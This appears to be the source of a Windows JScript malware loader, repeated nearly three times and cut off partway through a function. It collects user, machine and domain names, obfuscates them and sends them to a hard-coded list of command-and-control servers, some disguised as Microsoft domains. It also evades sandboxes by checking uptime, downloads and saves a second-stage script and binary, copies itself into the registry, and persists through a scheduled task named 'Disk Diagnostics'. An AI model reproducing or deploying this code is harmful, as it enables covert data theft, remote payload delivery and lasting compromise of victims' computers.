- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
- return temp.concat("\\").concat(filename);
- }
- Loader.DeployClient = function() {
- if (Loader.Uptime <= 3000) {
- WScript.Quit(0);
- }
- for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
- for (var j = 0; j < config.PRIMARY_C2.length; j++) {
- try {
- var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
- response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
- if (response.indexOf('<<<CLIENT__') !== -1) {
- var client = response.replace('<<<CLIENT__', '');
- client = Base64text(client);
- Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
- Windows.RegWrite("SetupServiceKey", Loader.GetUid());
- SELECTED_C2 = config.PRIMARY_C2[j];
- Loader.Persist(client);
- return;
- }
- } catch (e) {
- }
- WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
- }
- }
- }
- Loader.Persist = function(client){
- var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
- var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
- Windows.Execute(taskCommand);
- Windows.RegWrite("ServerUrl", client);
- Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
- Windows.CreateFile(GlobalStrings.NTFILE_PATH);
- Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
- Loader.DeployHost();
- }
- function debug(message){
- ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
- }
- function Base64text(string){
- var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
- var element = XmlDOM.createElement("tempContainer");
- element.dataType = "bin.Base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- stream.Position = 0;
- stream.Type = 2;
- stream.CharSet = "utf-8";
- return stream.ReadText();
- }
- function StringToBinary(string){
- var BinaryStream = new ActiveXObject("ADODB.Stream");
- BinaryStream.Type = 2;
- BinaryStream.CharSet = "ascii";
- BinaryStream.Open();
- BinaryStream.WriteText(string);
- BinaryStream.Position = 0;
- BinaryStream.Type = 1;
- BinaryStream.Position = 0;
- return BinaryStream.Read();
- }
- function Base64bytes(string){
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.text = string;
- var stream = WScript.CreateObject("ADODB.Stream");
- stream.Type = 1;
- stream.Open();
- stream.Write(element.nodeTypedValue);
- return stream;
- }
- function Base64Encode(string) {
- var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
- var element = XmlDOM.createElement("Base64Data");
- element.dataType = "bin.base64";
- element.nodeTypedValue = StringToBinary(string);
- return element.text.replace(/\n/g, "").replace(/\/\//g, "");
- }
- if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
- Loader.DeployClient();
- }
- var config = {
- PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
- SOFT_SIG : 'mad29',
- SOFT_VERSION: 32,
- C2_REQUEST_SLEEP : 21,
- C2_FAIL_SLEEP : 21,
- C2_FAIL_COUNT : 20,
- C2_OB_KEY : 'JxTRG4mY',
- C2_PREFIX : 'rpc.aspx'
- }
- var SELECTED_C2 = config.PRIMARY_C2[0];
- Math.imul = function (a, b) {
- var ah = (a >>> 16) & 0xffff;
- var al = a & 0xffff;
- var bh = (b >>> 16) & 0xffff;
- var bl = b & 0xffff;
- return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
- };
- var GlobalStrings = {
- REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
- WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
- WMIC_EXEC : "wmic process call create \"%path%\"",
- TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
- TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
- NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
- ADS_SSID : "HDDScan",
- PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
- TASK_NAME : "Disk Diagnostics"
- }
- var ObjectProducer = {}
- ObjectProducer.AccesibleObjects = {
- MAIN_SH_OBJECT : 'WScript.Shell',
- STREAM_ACCESS_OBJECT : 'ADODB.Stream',
- XML_TREE_OBJECT : 'Microsoft.XMLDOM',
- XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
- HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
- FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
- };
- ObjectProducer.GetRootConstructor = function(){
- return ActiveXObject;
- }
- ObjectProducer.GetInstance = function(instanceKey){
- var rootConstructor = ObjectProducer.GetRootConstructor();
- return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
- }
- var DataTools = {};
- DataTools.KEY_BASE = 1029;
- DataTools.DeriveKey = function(keyStr){
- var keyBase = DataTools.KEY_BASE;
- var key = 0;
- for(var i = 0; i < keyStr.length; i++){
- keyBase = keyBase ^ keyStr.charCodeAt(i);
- }
- var _keyBase = keyBase.toString();
- for(var i = 0; i < _keyBase.length; i++){
- key += parseInt(_keyBase.charAt(i));
- }
- return key;
- }
- DataTools.RotString = function(str, key){
- var rotd = "";
- for(var i = 0; i < str.length; i++){
- rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
- }
- return rotd;
- }
- DataTools.Hash = function(str){
- for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
- h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
- return ((h ^ h >>> 16) >>> 0).toString(16);
- }
- DataTools.Random = {};
- DataTools.Random.Number = function(min, max){
- min = Math.ceil(min);
- max = Math.floor(max);
- return Math.floor(Math.random() * (max - min + 1)) + min;
- }
- DataTools.Random.String = function(len){
- var alphabet = "qwertyuiopasdfghjklzxcvbnm";
- var result = "";
- for(var i = 0; i < len; i++){
- var chr = DataTools.Random.Number(0, alphabet.length-1);
- result = result.concat(alphabet.charAt(chr));
- }
- return result;
- }
- DataTools.Strings = {};
- DataTools.Strings.ParseTemplate = function(str, templateStr){
- var template = templateStr.split('&');
- for(var i = 0; i < template.length; i++){
- var keyValue = template[i].split('=');
- str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
- }
- return str;
- }
- var Windows = {};
- Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
- Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
- Windows.Execute = function(command){
- Windows.CoMainObject.Run(command);
- }
- Windows.GetEnv = function(env){
- return Windows.CoMainObject.ExpandEnvironmentStrings(env);
- }
- Windows.RegRead = function(path){
- return Windows.CoMainObject.RegRead(path);
- }
- Windows.RegWrite = function(entry, value){
- Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
- }
- Windows.CreateFile = function(path){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
- fHandle.WriteLine(DataTools.Random.String(1024));
- fHandle.Close();
- }
- Windows.AppendDataStream = function(path, stream, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
- fHandle.WriteLine(data);
- fHandle.Close();
- }
- Windows.AppendDataStreamB = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.WriteData = function(path, data){
- var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
- fHandle.Write(data);
- fHandle.Close();
- }
- Windows.WriteBytes = function(path, data){
- data.SaveToFile(path, 2);
- data.Close();
- }
- Windows.WriteDataStreamBytes = function(path, stream, data){
- data.SaveToFile(path.concat(":").concat(stream), 2);
- data.Close();
- }
- Windows.ReadFile = function(path){
- var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
- return fHandle.ReadAll();
- }
- Windows.GetWMIProvider = function(pcname){
- return GetObject("winmgmts:"+
- "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
- }
- Windows.GetUptime = function(){
- try{
- var wmi = Windows.GetWMIProvider(".");
- var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
- var e = new Enumerator(queryResult);
- return parseInt(e.item().SystemUpTime);
- }catch(e){
- return 0;
- }
- }
- Windows.GetArch = function(){
- var architecture = "64";
- var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
- if(product.indexOf('Windows 7') != -1){
- architecture = "32";
- }
- return architecture;
- }
- var Http = {};
- Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
- Http.Request = function(url){
- try{
- Http.Client.Open('GET', url, false);
- Http.Client.Send();
- if(Http.Client.Status == 200)
- return Http.Client.ResponseText;
- else
- return "";
- }catch(e){
- return ""
- }
- }
- var Loader = {};
- Loader.USERNAME = Windows.GetEnv("%username%");
- Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
- Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
- Loader.Uptime = Windows.GetUptime();
- Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
- Loader.GetUid = function(){
- return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
- }
- Loader.GetInitialRequest = function(nonce){
- var uid = Loader.GetUid();
- var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
- var sessionKey = nonce + config.C2_OB_KEY;
- request = request.join(":");
- request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
- request = Base64Encode(request);
- return encodeURIComponent(request);
- }
- Loader.GetInitialEndpoint = function(){
- var nonce = DataTools.Random.String(12)
- var request = Loader.GetInitialRequest(nonce);
- var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
- return endpoint;
- }
- Loader.DeployHost = function(){
- var temp = Windows.GetEnv("%temp%");
- var architecture = Windows.GetArch();
- var nonce = DataTools.Random.String(12);
- var uid = Loader.GetUid();
- var sessionKey = nonce + config.C2_OB_KEY;
- var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
- encodedId = Base64Encode(encodedId);
- encodedId = encodeURIComponent(encodedId);
- var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
- pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
- var filename = uid.concat(".bin");
- Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
